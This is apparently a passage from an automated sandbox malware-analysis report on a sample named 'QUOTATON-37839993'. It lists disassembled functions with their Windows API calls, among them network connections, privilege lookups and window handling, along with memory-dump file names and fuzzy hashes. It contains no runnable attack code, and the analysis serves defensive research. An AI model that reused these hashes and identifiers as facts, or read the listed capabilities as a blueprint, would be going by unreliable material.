                                                                        • Part of subcall function 00E63641: GetCurrentThreadId.KERNEL32 ref: 00E63662
                                                                        • Part of subcall function 00E63641: AttachThreadInput.USER32(00000000,?,00E65005), ref: 00E63669
                                                                      • GetCaretPos.USER32(?), ref: 00E84F13
                                                                      • ClientToScreen.USER32(00000000,?), ref: 00E84F4E
                                                                      • GetForegroundWindow.USER32 ref: 00E84F54
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      • Opcode ID: 3f41ecc44665b397f274b89a8d18023490a76944b1453d2e4ed788dab93ddc2d
                                                                      • Instruction ID: f7ad4c8e956adb499edf282c349e468165041ee1aa42c10e759b2f108b9aaaf4
                                                                      • Opcode Fuzzy Hash: 3f41ecc44665b397f274b89a8d18023490a76944b1453d2e4ed788dab93ddc2d
                                                                      • Instruction Fuzzy Hash: CC312DB1E00108AFDB00EFB5C9859EFB7F9EF88300F10546AE415F7242DA719E458BA0
                                                                      Function 00E8C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • GetCursorPos.USER32(?), ref: 00E8C4D2
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E3B9AB,?,?,?,?,?), ref: 00E8C4E7
                                                                      • GetCursorPos.USER32(?), ref: 00E8C534
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E3B9AB,?,?,?), ref: 00E8C56E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: 272930275b51b0ec2b112ba8db0cd8556b9e0786d81cbc9595c5e20bc0416160
                                                                      • Instruction ID: 6956d324b3956d90f93577447bb9c91d213bbe06e04c58f00504f3cdf9756535
                                                                      • Opcode Fuzzy Hash: 272930275b51b0ec2b112ba8db0cd8556b9e0786d81cbc9595c5e20bc0416160
                                                                      • Instruction Fuzzy Hash: D231A036600058AFCF25DF99C858EEA7BF5EB0A310F144069F90DAB261C731AD91DBA4
                                                                      Function 00E58656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E58121
                                                                        • Part of subcall function 00E5810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E5812B
                                                                        • Part of subcall function 00E5810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E5813A
                                                                        • Part of subcall function 00E5810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58141
                                                                        • Part of subcall function 00E5810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E58157
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00E586A3
                                                                      • _memcmp.LIBCMT ref: 00E586C6
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E586FC
                                                                      • HeapFree.KERNEL32(00000000), ref: 00E58703
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      • Opcode ID: 0030e9c1d178d40dbc49053f2d59df8d795c7a3f6622934db19c7e4a135f1934
                                                                      • Instruction ID: cca9a990e6a33e569dffce32f3e4841ae30d1242cd4a5182e7c50c031df96934
                                                                      • Opcode Fuzzy Hash: 0030e9c1d178d40dbc49053f2d59df8d795c7a3f6622934db19c7e4a135f1934
                                                                      • Instruction Fuzzy Hash: EA219071E01109EFDB10DFA4CA89BEEB7B8EF4430AF154459E844BB241DB70AE09CB50
                                                                      Function 00E2098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __setmode.LIBCMT ref: 00E209AE
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E67896,?,?,00000000), ref: 00E05A2C
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E67896,?,?,00000000,?,?), ref: 00E05A50
                                                                      • _fprintf.LIBCMT ref: 00E209E5
                                                                      • OutputDebugStringW.KERNEL32(?), ref: 00E55DBB
                                                                        • Part of subcall function 00E24AAA: _flsall.LIBCMT ref: 00E24AC3
                                                                      • __setmode.LIBCMT ref: 00E20A1A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                      • String ID:
                                                                      • API String ID: 521402451-0
                                                                      • Opcode ID: 02f1d00726ed78c8ab9c66d1db4fc3daacad023ed9e4961e1f6dc61b4ea1a187
                                                                      • Instruction ID: 64ef9ace80ab32f8cb53417e31b1c942d9c30125f3728f2a3037fb20928406fe
                                                                      • Opcode Fuzzy Hash: 02f1d00726ed78c8ab9c66d1db4fc3daacad023ed9e4961e1f6dc61b4ea1a187
                                                                      • Instruction Fuzzy Hash: 1E1166B2A042146FDB08B7B4BC469FEB7E89F81320F642116F105B31C3EE30588687A1
                                                                      Function 00E71767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E717A3
                                                                        • Part of subcall function 00E7182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E7184C
                                                                        • Part of subcall function 00E7182D: InternetCloseHandle.WININET(00000000), ref: 00E718E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$CloseConnectHandleOpen
                                                                      • String ID:
                                                                      • API String ID: 1463438336-0
                                                                      • Opcode ID: 3f1207f54c37deb5206156a9b644fccf30261fc600c6f9750ab1ac772c685f23
                                                                      • Instruction ID: c837713c7fa8b0ba07b5da36aeeca45af252593684391e6e233bbef9bf1ea78d
                                                                      • Opcode Fuzzy Hash: 3f1207f54c37deb5206156a9b644fccf30261fc600c6f9750ab1ac772c685f23
                                                                      • Instruction Fuzzy Hash: 4D218032200705BFEB169F649C01BBABBE9FF49710F10902EFA19B6550D7719815A7A1
                                                                      Function 00E63A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00E8FAC0), ref: 00E63A64
                                                                      • GetLastError.KERNEL32 ref: 00E63A73
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E63A82
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E8FAC0), ref: 00E63ADF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: 8d0231f883922300c87b46cefa5267fe4b14f7c94ed0f3aace41cf63cba5eb85
                                                                      • Instruction ID: 41e5f87d7d1da983075adf0cea2b6d73f7d029ed05efbe596c7c3e2cf7114933
                                                                      • Opcode Fuzzy Hash: 8d0231f883922300c87b46cefa5267fe4b14f7c94ed0f3aace41cf63cba5eb85
                                                                      • Instruction Fuzzy Hash: 1F21A2345482018FC710EF74D8818AAB7E4AF553A8F146A1DF4E9E72E1D7319E4ADB42
                                                                      Function 00E350E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00E35101
                                                                        • Part of subcall function 00E2571C: __FF_MSGBANNER.LIBCMT ref: 00E25733
                                                                        • Part of subcall function 00E2571C: __NMSG_WRITE.LIBCMT ref: 00E2573A
                                                                        • Part of subcall function 00E2571C: RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000000,?,?,?,00E20DD3,?), ref: 00E2575F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free
                                                                      • String ID:
                                                                      • API String ID: 614378929-0
                                                                      • Opcode ID: 284f49b6c680be4e278ce2283e1d0bdd97306651874d90b27c40cd59429d6c37
                                                                      • Instruction ID: 798d5456a89870c89fe4319ab1bbc16ac2ba640ff58d66d93d30cc7b172d0864
                                                                      • Opcode Fuzzy Hash: 284f49b6c680be4e278ce2283e1d0bdd97306651874d90b27c40cd59429d6c37
                                                                      • Instruction Fuzzy Hash: A111C173502E21AECF312F71B909B5E3BD89B10365F106929F908B6250DE308941C790
                                                                      Function 00E76369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00E67896,?,?,00000000), ref: 00E05A2C
                                                                        • Part of subcall function 00E05A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00E67896,?,?,00000000,?,?), ref: 00E05A50
                                                                      • gethostbyname.WSOCK32(?,?,?), ref: 00E76399
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E763A4
                                                                      • _memmove.LIBCMT ref: 00E763D1
                                                                      • inet_ntoa.WSOCK32(?), ref: 00E763DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 1504782959-0
                                                                      • Opcode ID: e71e97b5ca4315ab2ea51be7b644a2a64b28cebd28f497b1b69010ac4781ab9f
                                                                      • Instruction ID: 64272ebf940a61f1ce4182be4f9a83d4baa4457f4a4deea78e75a6509f16c437
                                                                      • Opcode Fuzzy Hash: e71e97b5ca4315ab2ea51be7b644a2a64b28cebd28f497b1b69010ac4781ab9f
                                                                      • Instruction Fuzzy Hash: 02114C32600109AFCB04FFA4D946CAEB7F8AF44310B549465F509B72A2DB30AE54CB61
                                                                      Function 00E58B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00E58B61
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58B73
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58B89
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E58BA4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID:
                                                                      • API String ID: 3850602802-0
                                                                      • Opcode ID: a8e484f1c7756c95ffb225ee4373d3dd1a1ef74ab5c4e050c1a683c5d5941beb
                                                                      • Instruction ID: deab8a3c5201364b4e1e922537eb0ba0d558d045cbbe3f837753166e492ebd31
                                                                      • Opcode Fuzzy Hash: a8e484f1c7756c95ffb225ee4373d3dd1a1ef74ab5c4e050c1a683c5d5941beb
                                                                      • Instruction Fuzzy Hash: 28115A79900218FFEB10DFA5CD84FADBBB8FB48710F2041A5EA00B7290DA716E14DB94
                                                                      Function 00E01290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00E012D8
                                                                      • GetClientRect.USER32(?,?), ref: 00E3B5FB
                                                                      • GetCursorPos.USER32(?), ref: 00E3B605
                                                                      • ScreenToClient.USER32(?,?), ref: 00E3B610
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Client$CursorLongProcRectScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 4127811313-0
                                                                      • Opcode ID: ccb649614f8123ea6ed48138adc8b4c3ca009e09cfadfa364af57ad3892342e2
                                                                      • Instruction ID: b80a4d4a690415bfce621d8ff22aa83067f60b9fdd6747117c5f5e9202fc3445
                                                                      • Opcode Fuzzy Hash: ccb649614f8123ea6ed48138adc8b4c3ca009e09cfadfa364af57ad3892342e2
                                                                      • Instruction Fuzzy Hash: C4113D35500019EFCB00DF95D8899EE77F8EB05300F4014A6F905FB190D730BA95EBA5
                                                                      Function 00E5D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00E5D84D
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E5D864
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E5D879
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00E5D897
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                                      • String ID:
                                                                      • API String ID: 1352324309-0
                                                                      • Opcode ID: 48761cdd838d2dcdd93af969e0e484df1a6b05f640ce3aa35c03b15dbf22a54c
                                                                      • Instruction ID: f02117db5ece214042fd8b633a4fabe954d9c19540cfecf161a80622cdffa8e4
                                                                      • Opcode Fuzzy Hash: 48761cdd838d2dcdd93af969e0e484df1a6b05f640ce3aa35c03b15dbf22a54c
                                                                      • Instruction Fuzzy Hash: 4C115E75609304DFE3348F51EC08F92BBBCEB00B01F108969EA5AE6050D7B0E94D9BA1
                                                                      Function 00E36FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                      • String ID:
                                                                      • API String ID: 3016257755-0
                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                      • Instruction ID: 93c092e7bda3de8c95b38a640a5371af5de46c4825aa03898dbcefaf88a4c2fb
                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                      • Instruction Fuzzy Hash: 23014EB244414ABBCF2A5E84CC49CED3F62BB18355F589455FE9868131D236C9B1EF81
                                                                      Function 00E8B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00E8B2E4
                                                                      • ScreenToClient.USER32(?,?), ref: 00E8B2FC
                                                                      • ScreenToClient.USER32(?,?), ref: 00E8B320
                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E8B33B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                                      • String ID:
                                                                      • API String ID: 357397906-0
                                                                      • Opcode ID: 77d6ae4130d3fb4cdb9687fe928ea240556a9918f39c242d008ffb7e02ccca4a
                                                                      • Instruction ID: 45be397d66d6f35672de2fbcaae9d0e63604c879aaf717dff06bced46ae93b84
                                                                      • Opcode Fuzzy Hash: 77d6ae4130d3fb4cdb9687fe928ea240556a9918f39c242d008ffb7e02ccca4a
                                                                      • Instruction Fuzzy Hash: 94117775D00209EFDB01DF99C4449EEBBF5FF18310F104166E915E3220D731AA559F90
                                                                      Function 00E66BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00E66BE6
                                                                        • Part of subcall function 00E676C4: _memset.LIBCMT ref: 00E676F9
                                                                      • _memmove.LIBCMT ref: 00E66C09
                                                                      • _memset.LIBCMT ref: 00E66C16
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E66C26
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                      • String ID:
                                                                      • API String ID: 48991266-0
                                                                      • Opcode ID: 156bac26bf86aca57ce6003e065592454a37905a8d570cdf0b7fa7c3427a0082
                                                                      • Instruction ID: a60bba7d9b8ae7c5887145450b6e65c6d7778ddb69c3bc32ecb016935a61842d
                                                                      • Opcode Fuzzy Hash: 156bac26bf86aca57ce6003e065592454a37905a8d570cdf0b7fa7c3427a0082
                                                                      • Instruction Fuzzy Hash: C0F05E3A200110BBCF016F55EC85A8ABB69EF45360F088065FE08AE267DB35E811CBB4
                                                                      Function 00E02218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSysColor.USER32(00000008), ref: 00E02231
                                                                      • SetTextColor.GDI32(?,000000FF), ref: 00E0223B
                                                                      • SetBkMode.GDI32(?,00000001), ref: 00E02250
                                                                      • GetStockObject.GDI32(00000005), ref: 00E02258
                                                                      • GetWindowDC.USER32(?,00000000), ref: 00E3BE83
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E3BE90
                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00E3BEA9
                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00E3BEC2
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00E3BEE2
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00E3BEED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
